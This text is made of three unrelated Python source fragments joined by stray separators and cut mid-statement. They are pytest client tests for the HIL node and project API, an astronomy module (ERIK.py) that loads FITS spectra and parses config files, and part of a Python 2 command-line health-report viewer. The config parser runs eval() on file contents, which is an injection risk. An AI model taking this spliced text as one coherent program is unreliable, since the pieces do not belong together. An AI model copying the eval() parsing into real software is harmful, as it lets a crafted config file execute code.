assert resp.ok, "Failed to register node with obmd."
# ...and with HIL:
assert C.node.register(
"obmd-node",
obmd_uri,
obmd_cfg['AdminToken'],
) is None
return 'obmd-node'
@pytest.fixture
def initial_admin():
"""Inserts an admin user into the database.
This fixture is used by Test_user tests
"""
with app.app_context():
from hil.ext.auth.database import User
db.session.add(User(username, password, is_admin=True))
db.session.commit()
class Test_ClientBase:
"""Tests client initialization and object_url creation. """
def test_object_url(self):
"""Test the object_url method."""
x = ClientBase(ep, 'some_base64_string')
y = x.object_url('abc', '123', 'xy23z')
assert y == 'http://127.0.0.1:8000/v0/abc/123/xy23z'
@pytest.mark.usefixtures('fail_on_log_warnings', 'configure', 'fresh_database',
'server_init', 'initial_db')
class Test_node:
""" Tests Node related client calls. """
def test_list_nodes_free(self):
"""(successful) to list_nodes('free')"""
assert C.node.list('free') == [
u'free_node_0', u'free_node_1', u'no_nic_node'
]
def test_list_nodes_all(self):
"""(successful) to list_nodes('all')"""
assert C.node.list('all') == [
u'free_node_0', u'free_node_1', u'manhattan_node_0',
u'manhattan_node_1', u'no_nic_node', u'runway_node_0',
u'runway_node_1'
]
def test_node_register(self):
"""Test node_register"""
assert C.node.register("dummy-node-01",
"http://obmd.example.com/node/dummy-node-01",
"secret",
) is None
def test_show_node(self):
"""(successful) to show_node"""
assert C.node.show('free_node_0') == {
u'metadata': {},
u'project': None,
u'nics': [
{
u'macaddr': u'Unknown',
u'port': None,
u'switch': None,
u'networks': {}, u'label': u'boot-nic'
},
{
u'macaddr': u'Unknown',
u'port': u'free_node_0_port',
u'switch': u'stock_switch_0',
u'networks': {}, u'label': u'nic-with-port'
}
],
u'name': u'free_node_0'
}
def test_show_node_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.show('node-/%]07')
def test_enable_disable_obm(self, obmd_node):
"""Test enable_obm/disable_obm"""
# The spec says that these calls should silently no-op if the
# state doesn't need to change so we call them repeatedly in
# different orders to verify.
C.node.disable_obm(obmd_node)
C.node.enable_obm(obmd_node)
C.node.enable_obm(obmd_node)
C.node.disable_obm(obmd_node)
C.node.disable_obm(obmd_node)
C.node.disable_obm(obmd_node)
C.node.enable_obm(obmd_node)
def test_power_cycle(self, obmd_node):
"""(successful) to node_power_cycle"""
C.node.enable_obm(obmd_node)
assert C.node.power_cycle(obmd_node) is None
def test_power_cycle_force(self, obmd_node):
"""(successful) to node_power_cycle(force=True)"""
C.node.enable_obm(obmd_node)
assert C.node.power_cycle(obmd_node, True) is None
def test_power_cycle_no_force(self, obmd_node):
"""(successful) to node_power_cycle(force=False)"""
C.node.enable_obm(obmd_node)
assert C.node.power_cycle(obmd_node, False) is None
def test_power_cycle_bad_arg(self, obmd_node):
"""error on call to power_cycle with bad argument."""
C.node.enable_obm(obmd_node)
with pytest.raises(FailedAPICallException):
C.node.power_cycle(obmd_node, 'wrong')
def test_power_cycle_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.power_cycle('node-/%]07', False)
def test_power_off(self, obmd_node):
"""(successful) to node_power_off"""
C.node.enable_obm(obmd_node)
assert C.node.power_off(obmd_node) is None
def test_power_off_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.power_off('node-/%]07')
def test_power_on(self, obmd_node):
"""(successful) to node_power_on"""
C.node.enable_obm(obmd_node)
assert C.node.power_on(obmd_node) is None
def test_set_bootdev(self, obmd_node):
""" (successful) to node_set_bootdev """
C.node.enable_obm(obmd_node)
assert C.node.set_bootdev(obmd_node, "A") is None
def test_power_status(self, obmd_node):
"""(successful) to node_power_status"""
C.node.enable_obm(obmd_node)
resp = C.node.power_status(obmd_node)
assert resp["power_status"] == "Mock Status"
def test_node_add_nic(self):
"""Test removing and then adding a nic."""
C.node.remove_nic('free_node_1', 'boot-nic')
assert C.node.add_nic('free_node_1', 'boot-nic', 'aa:bb:cc:dd:ee:ff') \
is None
def test_node_add_duplicate_nic(self):
"""Adding a nic twice should fail"""
C.node.remove_nic('free_node_1', 'boot-nic')
C.node.add_nic('free_node_1', 'boot-nic', 'aa:bb:cc:dd:ee:ff')
with pytest.raises(FailedAPICallException):
C.node.add_nic('free_node_1', 'boot-nic', 'aa:bb:cc:dd:ee:ff')
def test_nosuch_node_add_nic(self):
"""Adding a nic to a non-existent node should fail."""
with pytest.raises(FailedAPICallException):
C.node.add_nic('abcd', 'eth0', 'aa:bb:cc:dd:ee:ff')
def test_add_nic_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.add_nic('node-/%]08', 'eth0', 'aa:bb:cc:dd:ee:ff')
def test_remove_nic(self):
"""(successful) call to node_remove_nic"""
assert C.node.remove_nic('free_node_1', 'boot-nic') is None
def test_remove_duplicate_nic(self):
"""Removing a nic twice should fail"""
C.node.remove_nic('free_node_1', 'boot-nic')
with pytest.raises(FailedAPICallException):
C.node.remove_nic('free_node_1', 'boot-nic')
def test_remove_nic_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.remove_nic('node-/%]08', 'boot-nic')
def test_metadata_set(self):
""" test for registering metadata from a node """
assert C.node.metadata_set("free_node_0", "EK", "pk") is None
def test_metadata_delete(self):
""" test for deleting metadata from a node """
with pytest.raises(FailedAPICallException):
C.node.metadata_delete("free_node", "EK")
C.node.metadata_set("free_node_0", "EK", "pk")
assert C.node.metadata_delete("free_node_0", "EK") is None
def test_node_show_console(self, obmd_node):
"""various calls to node_show_console"""
# show console without enabling the obm.
with pytest.raises(FailedAPICallException):
C.node.show_console(obmd_node)
C.node.enable_obm(obmd_node)
# Read in a prefix of the output from the console; the obmd mock driver
# keeps counting forever.
console_stream = C.node.show_console(obmd_node)
expected = '\n'.join([str(i) for i in range(10)])
actual = ''
while len(actual) < len(expected):
actual += console_stream.next()
assert actual.startswith(expected)
C.node.disable_obm(obmd_node)
with pytest.raises(FailedAPICallException):
C.node.show_console(obmd_node)
def test_node_show_console_reserved_chars(self):
"""test for cataching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.show_console('node-/%]01')
def test_node_connect_network(self):
"""(successful) call to node_connect_network"""
response = C.node.connect_network(
'manhattan_node_1', 'nic-with-port', 'manhattan_pxe',
'vlan/native')
# check that the reponse contains a valid UUID.
assert uuid_pattern.match(response['status_id'])
deferred.apply_networking()
def test_node_connect_network_error(self):
"""Duplicate call to node_connect_network should fail."""
C.node.connect_network(
'manhattan_node_1', 'nic-with-port', 'manhattan_pxe',
'vlan/native')
deferred.apply_networking()
with pytest.raises(FailedAPICallException):
C.node.connect_network(
'manhattan_node_1', 'nic-with-port', 'manhattan_pxe',
'vlan/native')
deferred.apply_networking()
def test_node_connect_network_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.connect_network('node-/%]01', 'eth0', 'net-01',
'vlan/native')
def test_node_detach_network(self):
"""(successful) call to node_detach_network"""
C.node.connect_network(
'manhattan_node_0', 'nic-with-port', 'manhattan_pxe',
'vlan/native')
deferred.apply_networking()
response = C.node.detach_network(
'manhattan_node_0', 'nic-with-port', 'manhattan_pxe')
assert uuid_pattern.match(response['status_id'])
deferred.apply_networking()
def test_node_detach_network_error(self):
"""Duplicate call to node_detach_network should fail."""
C.node.connect_network(
'manhattan_node_0', 'nic-with-port', 'manhattan_pxe',
'vlan/native')
deferred.apply_networking()
C.node.detach_network(
'manhattan_node_0', 'nic-with-port', 'manhattan_pxe')
deferred.apply_networking()
with pytest.raises(FailedAPICallException):
C.node.detach_network(
'manhattan_node_0', 'nic-with-port', 'manhattan_pxe')
def test_node_detach_network_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.node.detach_network('node-/%]04', 'eth0', 'net-04')
@pytest.mark.usefixtures('fail_on_log_warnings', 'configure', 'fresh_database',
'server_init', 'initial_db')
class Test_project:
""" Tests project related client calls."""
def test_list_projects(self):
""" test for getting list of project """
assert C.project.list() == [u'empty-project', u'manhattan', u'runway']
def test_list_nodes_inproject(self):
""" test for getting list of nodes connected to a project. """
assert C.project.nodes_in('manhattan') == [
u'manhattan_node_0', u'manhattan_node_1']
assert C.project.nodes_in('runway') == [
u'runway_node_0', u'runway_node_1']
def test_list_nodes_inproject_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.nodes_in('pr/%[oj-01')
def test_list_networks_inproject(self):
""" test for getting list of networks connected to a project. """
assert C.project.networks_in('runway') == [
u'runway_provider', u'runway_pxe']
def test_list_networks_inproject_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.networks_in('pr/%[oj-01')
def test_project_create(self):
""" test for creating project. """
assert C.project.create('dummy-01') is None
def test_duplicate_project_create(self):
""" test for catching duplicate name while creating new project. """
C.project.create('dummy-02')
with pytest.raises(FailedAPICallException):
C.project.create('dummy-02')
def test_project_create_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.create('dummy/%[-02')
def test_project_delete(self):
""" test for deleting project. """
C.project.create('dummy-03')
assert C.project.delete('dummy-03') is None
def test_error_project_delete(self):
""" test to capture error condition in project delete. """
with pytest.raises(FailedAPICallException):
C.project.delete('dummy-03')
def test_project_delete_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.delete('dummy/%[-03')
def test_project_connect_detach_node(self):
""" test for connecting/detaching node to project. """
C.project.create('proj-04')
assert C.project.connect('proj-04', 'free_node_0') is None
# connecting it again should fail
with pytest.raises(FailedAPICallException):
C.project.connect('proj-04', 'free_node_0')
assert C.project.detach('proj-04', 'free_node_0') is None
def test_project_connect_node_nosuchobject(self):
""" test | |
<filename>MUTANTS/ERIK.py
# -*- coding: utf-8 -*-
# filE ReadIng and Kleaning [Magneto]
import json
import os
import typing
import subprocess
import uuid
from shutil import copyfile
from datetime import datetime
import numpy as np
from astropy.io import fits
from RAVEN import standardize_single_dataset, convert_bytes
def loadfiles(input_path: str = "/Volumes/Elements/Outputs/Input_20211213T154548_HjCktf.fits",
labels_path: str = "/Volumes/Elements/Outputs/Label_20211213T154548_HjCktf.fits",
method_standardize_spectra=2,
method_standardize_magnitudes=4,
method_standardize_label_sfh=3,
method_standardize_label_z=3,
verbose=1) -> typing.Tuple[np.array, np.array, np.array, np.array, np.array, np.array, np.array]:
"""
Load the dataset from file.
:param input_path:
:param labels_path:
:param method_standardize_spectra:
:param method_standardize_magnitudes:
:param method_standardize_label_sfh:
:param method_standardize_label_z:
:param verbose:
:return:
"""
# ToDo: argparse these variables
# Verify data is in 32 bits
verify32bits(input_path)
verify32bits(labels_path)
print("[INFO] Loading inputs...")
input_data, input_header = open_fits_file(input_path)
print("[INFO] Loading label...")
label_data, label_header = open_fits_file(labels_path)
print("[INFO] Input Data shape:", input_data.shape)
# Read the arrays from files
input_lenght_spectra = input_header["nspectra"]
label_agevec = label_header["nagevec"]
spectra_lambda = input_data[1:input_lenght_spectra + 1, 0]
agevec = label_data[1:label_agevec + 1, 0]
input_spectra = input_data[1:input_lenght_spectra + 1, 1:]
input_magnitudes = input_data[input_lenght_spectra + 1:, 1:]
label_sfh = label_data[1:label_agevec + 1, 1:]
label_z = label_data[label_agevec + 1:, 1:]
# All these vectors are ordered the other way around. Transpose them
input_spectra = input_spectra.transpose()
input_magnitudes = input_magnitudes.transpose()
label_sfh = label_sfh.transpose()
label_z = label_z.transpose()
# Calculate ageweights
age_separations = [0]
for i in range(len(agevec) - 1):
age_separations.append((agevec[i + 1] + agevec[i])/2)
# Add last value in the separation (magemax=13.8)
age_separations.append(13.8e9)
ageweights = []
for i in range(len(age_separations) - 1):
ageweights.append(age_separations[i + 1] - age_separations[i])
input_spectra, input_magnitudes, label_sfh, label_z = \
standardize_dataset(input_spectra, input_magnitudes, label_sfh, label_z,
method_standardize_spectra=method_standardize_spectra,
method_standardize_magnitudes=method_standardize_magnitudes,
method_standardize_label_sfh=method_standardize_label_sfh,
method_standardize_label_z=method_standardize_label_z,
ageweights=ageweights)
if verbose > 0:
print(f"""
Variable sizes:
Input_spectra: {input_spectra.shape} - {convert_bytes(input_spectra.nbytes)}
Input_magnitudes: {input_magnitudes.shape} - {convert_bytes(input_magnitudes.nbytes)}
Label_sfh: {label_sfh.shape} - {convert_bytes(label_sfh.nbytes)}
Label_z: {label_z.shape} - {convert_bytes(label_z.nbytes)}
""")
return input_spectra, input_magnitudes, label_sfh, label_z, spectra_lambda, agevec, ageweights
def verify32bits(filepath, verbose=1):
"""
Verifies if the file is in -32 or -64 format. If double (-64), reduces to single (-32).
:param verbose:
:param filepath:
:return:
"""
with fits.open(filepath, mode="update") as hdul:
if hdul[0].header["bitpix"] == -64:
if verbose == 1:
print(f"File ({os.path.basename(filepath)}) has BITPIX={hdul[0].header['bitpix']}.\n" +
f"Reducing to single precision (-32) ...")
if verbose == 2:
print(f"File ({filepath}) has BITPIX={hdul[0].header['bitpix']}.\n"
f"Reducing to single precision (-32) ...")
# Reduce to -32
hdul[0].data = hdul[0].data.astype(np.float32)
hdul.flush()
if verbose == 2:
print(f"Correctly reduced {os.path.basename(filepath)} to -32.")
def clean_line(idx_line, line_str):
line_str = line_str.strip()
if line_str[:2] == "//" or len(line_str) == 0:
return None
if line_str.count("=") != 1:
print(f"[ERROR WHILE READING CONFIG FILE] line {idx_line} does not have a '"
f"'valid number of '='. Line skipped.")
return None
# Check if there is a comment behind a parameter
if "//" in line_str:
line_str = line_str.split("//")[0]
split_line = line_str.split("=")
split_line = [x.strip() for x in split_line] # Clean spaces
return tuple(split_line)
def getparametersfromid(filename, id_searched, verbose=0, returnfunction=False):
"""
Returns the parameters that were used to generate a specific piece of information given an ID and the metadata file.
It will verify if the the metadata has the "Combined" parameter, in which case it will seach for the subset id.
:param verbose:
:param filename:
:param id_searched:
:param returnfunction:
:return:
"""
# ToDo: Maybe verify UUIDs?
# ToDo: Have an input that calls the R execution to generate the data again?
# Open Metadata file
with open(filename) as file_:
data = json.load(file_)
if verbose > 1:
print(json.dumps(data, indent=4, sort_keys=True))
pass
# Verify if combined
try:
combined = data["Combined"]
except KeyError:
combined = False
# If combined, look in which subset needs to be searched.
# Additionally, look up which is the value that was added (and needs to be subtracted)
id_subset = None
if combined:
for id_subset, last_id_this_subset in enumerate(data["Last_ID"]):
if id_searched <= last_id_this_subset:
break
# Reduce id_searched according to the previous last_id, if id_subset > 0
if id_subset > 0:
id_searched -= data["Last_ID"][id_subset - 1]
# Reduce data to subset for the search
data = data[str(id_subset)]
# Read parameters that will be used
random_samples = data["randomSamples"][0]
order_parameters = data["orderParameters"]
massfunc_names = list(order_parameters.keys())
accumulated_combinations = 0
# Iterate over the different massfunc Names
for mfunc in massfunc_names:
# Mass data for mfunc
mass_data_mfunc = data["massParams"][mfunc]
# Name of parameters
mass_keys_mfunc = [x if x in list(mass_data_mfunc.keys()) else None for x in order_parameters[mfunc]["mass"]]
# Possible values of parameters
mass_parameters = [mass_data_mfunc[x] for x in mass_keys_mfunc]
# Number of possible values for each parameters
number_values_mass_parameters = [len(x) for x in mass_parameters]
# Obtain same values for Z
z_data_mfunc = data["ZParams"]
z_keys_for_mfunc = [x if x in list(z_data_mfunc.keys()) else None for x in order_parameters[mfunc]["Z"]]
z_parameters = [z_data_mfunc[x] for x in z_keys_for_mfunc]
number_values_z_parameters = [len(x) for x in z_parameters]
# Once all the data is recollected, number of cases are calculated
# All the parameter names
all_parameters = mass_keys_mfunc + z_keys_for_mfunc
# Values of the parameters
values_all_parameters = mass_parameters + z_parameters
# How many parameters are there (+ randomSample)
nparam = len(all_parameters) + 1
# How many cases are there for each parameter
number_all_parameters = number_values_mass_parameters + number_values_z_parameters + [random_samples]
# Calculate how many iterations there are for every case
number_combinations = [0] * nparam
number_combinations[-1] = random_samples + 1
for i in reversed(range(nparam - 1)):
number_combinations[i] = number_combinations[i + 1] * number_all_parameters[i]
# Verify if ID is bigger than all possible combinations for this massfunc
# If true, skip current massfunc and try with the next. Increase accumulated_combinations
if id_searched > accumulated_combinations + number_combinations[0]:
accumulated_combinations += number_combinations[0]
continue
# If smaller, it will stay with this massfunc
current_id = id_searched - accumulated_combinations - 1
idx_param = [0] * nparam
for idx in range(nparam - 1):
# Calculate from biggest to smallest the index of the parameter that was used.
idx_param[idx] = int(current_id / number_combinations[idx + 1])
current_id -= idx_param[idx] * number_combinations[idx + 1]
# Add randomSample at the end
idx_param[-1] = current_id
# Generate the final dictionary that will be returned
final_dictionary = {"massfunction": mfunc}
for f in range(nparam - 1):
final_dictionary[all_parameters[f]] = values_all_parameters[f][idx_param[f]]
if idx_param[-1] == 0:
final_dictionary["randomSample"] = False
else:
final_dictionary["randomSample"] = True
if verbose >= 1:
print(final_dictionary)
if returnfunction:
final_dictionary["mfunction"] = mass_data_mfunc["func"]
final_dictionary["zfunction"] = z_data_mfunc["func"]
return final_dictionary
def read_config_file(filename, file_folder=None, reset_file=False, default_config_file="Data/default_config_file.txt"):
# ToDo: Docstring
if type(filename) is not str:
raise KeyError("filename needs to be a string")
if file_folder is None:
file_folder = os.getcwd()
# simplify full filename
full_filename = os.path.join(file_folder, filename)
# Check if file is there. If it isn't, generate a blank file with information templat
if not os.path.isfile(full_filename) or reset_file:
print(f"[INFO] There is no config file. A template will be created at {os.path.join(file_folder, filename)} .")
copyfile(default_config_file, os.path.join(file_folder, filename))
# ToDo: This path should be linked to the env_variable that reads where the data for the library is stored
# Open file and read the configuration parameters.
with open(full_filename, 'r') as f:
lines = f.readlines()
# Verify sintax and clean list
cv_params = False
cv_parameters = dict()
parameters = dict()
for idx, line in enumerate(lines):
cleaned_line = clean_line(idx, line)
if cleaned_line is not None:
if cleaned_line[0] == "CVParams" and eval(cleaned_line[1]):
cv_params = True
continue
if cv_params:
tmp = eval(cleaned_line[1])
if type(tmp) == tuple:
cv_parameters[cleaned_line[0]] = tmp[0]
else:
cv_parameters[cleaned_line[0]] = tmp
else:
tmp = eval(cleaned_line[1])
if type(tmp) == tuple:
parameters[cleaned_line[0]] = tmp[0]
else:
parameters[cleaned_line[0]] = tmp
return parameters, cv_parameters
def combine_datasets(file_list_sufixes: list, file_folder="", combined_output_sufix: str = "combined", overwrite=True,
whichrscript: str = "/usr/local/bin/Rscript"):
"""
Combines n datasets into a single combined dataset, where n=len(file_list_sufixes).
The files are located in file_folder (relative or absolute path). The outputs will be stored in the same folder.
The three files will be called:
-Input_[combined_output_sufix].fits
-Label_[combined_output_sufix].fits
-MetaD_[combined_output_sufix].fits
:param file_list_sufixes: Suffixes should not contain extensions
:param file_folder:
:param combined_output_sufix:
:param overwrite:
:param whichrscript:
"""
# if the length of file_list_sufixes == ["all"], it will use all files.
if file_list_sufixes == ["all"]:
# Get all files
file_list_sufixes = os.listdir(file_folder)
# Filter only Inputs and keep only sufixes
file_list_sufixes = [_[6:-5] for _ in file_list_sufixes if _[0:6] == "Input_"]
# If combined is here, remove it
file_list_sufixes = [_ for _ in file_list_sufixes if _ != "combined"]
# Sort
file_list_sufixes.sort()
print(f"[INFO] All files in path are going | |
+= next_group
continue
elif next_group == '\n':
if prev_group != '\n':
next_peeked.append(next_group)
break
if highlight:
result += terminal.uninverse()
highlight = False
elif prev_group == next_group:
if highlight:
result += terminal.uninverse()
highlight = False
else:
if not highlight:
result += terminal.inverse()
highlight = True
result += next_group
if '\n' == prev_group and '\n' != next_group:
continue
break
for next_group in next_iterator:
if next_group == ' ' or next_group == '\n':
if highlight:
result += terminal.uninverse()
highlight = False
else:
if not highlight:
result += terminal.inverse()
highlight = True
result += next_group
if highlight:
result += terminal.reset()
highlight = False
result = "".join(result)
previous = output
else:
result = output
previous = output
ts = time.time()
st = datetime.datetime.fromtimestamp(
ts).strftime(' %Y-%m-%d %H:%M:%S')
command = " ".join(line)
print >> real_stdout, "[%s '%s' sleep: %ss iteration: %s" % (
st, command, sleep, count),
if num_iterations:
print >> real_stdout, " of %s" % (num_iterations),
print >> real_stdout, "]"
print >> real_stdout, result
if num_iterations and num_iterations <= count:
break
count += 1
time.sleep(sleep)
except (KeyboardInterrupt, SystemExit):
return
finally:
sys.stdout = real_stdout
print ''
###########################
### Health Print functions
###########################
@staticmethod
def _print_data(d):
if d is None:
return
if isinstance(d, tuple):
print d
elif isinstance(d, dict):
print_dict(d)
else:
print str(d)
@staticmethod
def _print_counter_list(data, header=None):
if not data:
return
print "\n" + ("_" * 100) + "\n"
if header:
print terminal.fg_red() + terminal.bold() + str(header) + " ::\n" + terminal.unbold() + terminal.fg_clear()
for d in data:
CliView._print_data(d)
print ""
@staticmethod
def _print_status(status_counters, verbose=False):
if not status_counters:
return
s = "\n" + terminal.bold() + "Summary".center(H_width, "_") + terminal.unbold()
s += "\n" + CliView._get_header("Total") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_QUERY_COUNTER])])
s += CliView._get_header("Passed") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_PASSED_COUNTER])])
s += CliView._get_header("Failed") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_FAILED_COUNTER])])
s += CliView._get_header("Skipped") + CliView._get_msg([str(status_counters[HealthResultCounter.ASSERT_QUERY_COUNTER]
- status_counters[HealthResultCounter.ASSERT_FAILED_COUNTER]
- status_counters[HealthResultCounter.ASSERT_PASSED_COUNTER])])
print s
@staticmethod
def _print_debug_messages(ho):
try:
for d in ho[HealthResultType.DEBUG_MESSAGES]:
try:
print "Value of %s:" % (d[1])
CliView._print_data(d[2])
except Exception:
pass
except Exception:
pass
@staticmethod
def _print_exceptions(ho):
try:
for e in ho[HealthResultType.EXCEPTIONS]:
try:
CliView._print_counter_list(
data=ho[HealthResultType.EXCEPTIONS][e], header="%s Exceptions" % (e.upper()))
except Exception:
pass
except Exception:
pass
@staticmethod
def _get_header(header):
return "\n" + terminal.bold() + ("%s:" % header).rjust(H1_offset) + \
terminal.unbold() + " ".rjust(H2_offset - H1_offset)
@staticmethod
def _get_msg(msg, level=None):
if level is not None:
if level == AssertLevel.WARNING:
return terminal.fg_blue() + ("\n" + " ".rjust(H2_offset)).join(msg) + terminal.fg_clear()
elif level == AssertLevel.INFO:
return terminal.fg_green() + ("\n" + " ".rjust(H2_offset)).join(msg) + terminal.fg_clear()
else:
return terminal.fg_red() + ("\n" + " ".rjust(H2_offset)).join(msg) + terminal.fg_clear()
else:
return ("\n" + " ".rjust(H2_offset)).join(msg)
@staticmethod
def _format_value(val, formatting=True):
if not val or not formatting:
return val
if isinstance(val, int):
try:
# For python 2.7
return str(format(val, ',d'))
except Exception:
try:
# For python 2.6
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
return str(locale.format('%d', val, True))
except Exception:
pass
elif isinstance(val, float):
return_val = None
try:
# For python 2.7
return_val = format(val, ',f')
except Exception:
try:
# For python 2.6
locale.setlocale(locale.LC_ALL, 'en_US.UTF-8')
return_val = locale.format('%f', val, True)
except Exception:
pass
if return_val is not None:
return_val = str(return_val)
if '.' in return_val:
return_val = return_val.rstrip('0')
return_val = return_val.rstrip('.')
return return_val
elif isinstance(val, str) and val.isdigit():
return CliView._format_value(int(val))
elif isinstance(val, str):
try:
val = float(val)
return CliView._format_value(val)
except Exception:
pass
return val
@staticmethod
def _get_kv_msg_list(kv_list):
if not kv_list:
return []
res_str = []
for kv in kv_list:
if not isinstance(kv, tuple):
res_str.append(str(kv))
continue
tmp_res_str = str(kv[0])
if kv[1] and isinstance(kv[1], list):
_str = None
for _kv in kv[1]:
if _kv:
try:
_str += ", " + ("%s:"%(str(_kv[0])) if len(str(_kv[0]).strip())>0 else "") + "%s"%(CliView._format_value(_kv[1], _kv[2]))
except Exception:
_str = ("%s:"%(str(_kv[0])) if len(str(_kv[0]).strip())>0 else "") + "%s"%(CliView._format_value(_kv[1], _kv[2]))
if _str:
tmp_res_str += " {%s}"%(_str)
if tmp_res_str:
res_str.append(tmp_res_str)
return res_str
@staticmethod
def _get_error_string(data, verbose=False, level=AssertLevel.CRITICAL):
if not data:
return "", 0
f_msg_str = ""
f_msg_cnt = 0
s_msg_str = ""
s_msg_cnt = 0
for d in data:
s = ""
if d[AssertResultKey.LEVEL] == level:
if d[AssertResultKey.SUCCESS]:
if d[AssertResultKey.SUCCESS_MSG]:
s_msg_str += CliView._get_header(d[AssertResultKey.CATEGORY][0]) + \
CliView._get_msg([d[AssertResultKey.SUCCESS_MSG]])
s_msg_cnt += 1
continue
s += CliView._get_header(d[AssertResultKey.CATEGORY][0]) + \
CliView._get_msg([d[AssertResultKey.FAIL_MSG]], level)
if verbose:
import textwrap
s += "\n"
s += CliView._get_header("Description:")
s += CliView._get_msg(textwrap.wrap(str(d[AssertResultKey.DESCRIPTION]), H_width - H2_offset,
break_long_words=False, break_on_hyphens=False))
s += "\n"
s += CliView._get_header("Keys:")
s += CliView._get_msg(CliView._get_kv_msg_list(d[AssertResultKey.KEYS]))
# Extra new line in case verbose output is printed
s += "\n"
f_msg_str += s
f_msg_cnt += 1
res_fail_msg_str = ""
if f_msg_cnt > 0:
res_fail_msg_str += f_msg_str
res_success_msg_str = ""
if s_msg_cnt > 0:
# res_success_msg_str = "\n\n"
# res_success_msg_str += (".".join(data[0]
# [AssertResultKey.CATEGORY]) + ":").ljust(25) + ""
res_success_msg_str += s_msg_str
return res_fail_msg_str, f_msg_cnt, res_success_msg_str, s_msg_cnt
@staticmethod
def _get_assert_output_string(assert_out, verbose=False, output_filter_category=[], level=AssertLevel.CRITICAL):
if not assert_out:
return ""
res_fail_msg_str = ""
total_fail_msg_cnt = 0
res_success_msg_str = ""
total_success_msg_cnt = 0
if not isinstance(assert_out, dict):
if not output_filter_category:
return CliView._get_error_string(assert_out, verbose, level=level)
else:
for _k in sorted(assert_out.keys()):
category = []
if output_filter_category:
if _k == output_filter_category[0]:
category = output_filter_category[1:] if len(
output_filter_category) > 1 else []
else:
category = output_filter_category
f_msg_str, f_msg_cnt, s_msg_str, s_msg_cnt = CliView._get_assert_output_string(
assert_out[_k], verbose, category, level=level)
res_fail_msg_str += f_msg_str
total_fail_msg_cnt += f_msg_cnt
res_success_msg_str += s_msg_str
total_success_msg_cnt += s_msg_cnt
return res_fail_msg_str, total_fail_msg_cnt, res_success_msg_str, total_success_msg_cnt
@staticmethod
def _print_assert_summary(assert_out, verbose=False, output_filter_category=[], output_filter_warning_level=None):
if not output_filter_warning_level:
search_levels = [AssertLevel.INFO, AssertLevel.WARNING, AssertLevel.CRITICAL]
elif output_filter_warning_level == "CRITICAL":
search_levels = [AssertLevel.CRITICAL]
elif output_filter_warning_level == "WARNING":
search_levels = [AssertLevel.WARNING]
elif output_filter_warning_level == "INFO":
search_levels = [AssertLevel.INFO]
else:
search_levels = [AssertLevel.INFO, AssertLevel.WARNING, AssertLevel.CRITICAL]
all_success_str = ""
all_fail_str = ""
all_fail_cnt = 0
all_success_cnt = 0
for level in search_levels:
res_fail_msg_str = ""
total_fail_msg_cnt = 0
res_success_msg_str = ""
total_success_msg_cnt = 0
for _k in sorted(assert_out.keys()):
if not assert_out[_k]:
continue
category = []
if output_filter_category:
if _k == output_filter_category[0]:
category = output_filter_category[1:] if len(
output_filter_category) > 1 else []
else:
category = output_filter_category
f_msg_str, f_msg_cnt, s_msg_str, s_msg_cnt = CliView._get_assert_output_string(
assert_out[_k], verbose, category, level=level)
if f_msg_str:
total_fail_msg_cnt += f_msg_cnt
res_fail_msg_str += f_msg_str
if s_msg_str:
total_success_msg_cnt += s_msg_cnt
res_success_msg_str += s_msg_str
if total_fail_msg_cnt > 0:
summary_str = ""
if level == AssertLevel.CRITICAL:
summary_str = terminal.bold() + terminal.fg_red() + str("%s" %
("CRITICAL")).center(H_width, " ") + terminal.fg_clear() + terminal.unbold()
elif level == AssertLevel.WARNING:
summary_str = terminal.bold() + terminal.fg_blue() + str("%s" %
("WARNING")).center(H_width, " ") + terminal.fg_clear() + terminal.unbold()
elif level == AssertLevel.INFO:
summary_str = terminal.bold() + terminal.fg_green() + str("%s" %
("INFO")).center(H_width, " ") + terminal.fg_clear() + terminal.unbold()
all_fail_str += "\n" + summary_str + "\n" + res_fail_msg_str + "\n"
all_fail_cnt += total_fail_msg_cnt
if total_success_msg_cnt > 0:
all_success_str += res_success_msg_str
all_success_cnt += total_success_msg_cnt
if all_success_cnt > 0:
print "\n\n" + terminal.bold() + str(" %s: count(%d) " %("PASS", all_success_cnt)).center(H_width, "_") + terminal.unbold()
print all_success_str
if all_fail_cnt > 0:
print "\n\n" + terminal.bold() + str(" %s: count(%d) " %("FAIL", all_fail_cnt)).center(H_width, "_") + terminal.unbold()
print all_fail_str
print "_" * H_width + "\n"
@staticmethod
def print_health_output(ho, verbose=False, debug=False, output_file=None, output_filter_category=[], output_filter_warning_level=None):
if not ho:
return
o_s = None
if output_file is not None:
try:
o_s = open(output_file, "a")
sys.stdout = o_s
except Exception:
sys.stdout = sys.__stdout__
CliView._print_debug_messages(ho)
if debug:
CliView._print_exceptions(ho)
CliView._print_status(
ho[HealthResultType.STATUS_COUNTERS], verbose=verbose)
CliView._print_assert_summary(ho[HealthResultType.ASSERT], verbose=verbose,
output_filter_category=output_filter_category, output_filter_warning_level=output_filter_warning_level)
if o_s:
o_s.close()
sys.stdout = sys.__stdout__
###########################
@staticmethod
def get_summary_line_prefix(index, key):
s = " " * 3
s += str(index)
s += "." + (" " * 3)
s += key.ljust(19)
s += ":" + (" " * 2)
return s
@staticmethod
def _summary_namespace_table_view(stats, **ignore):
title = "Namespaces"
column_names = ('namespace', ('_devices', 'Devices (Total,Per-Node)'), ('_memory', 'Memory (Total,Used%,Avail%)'),
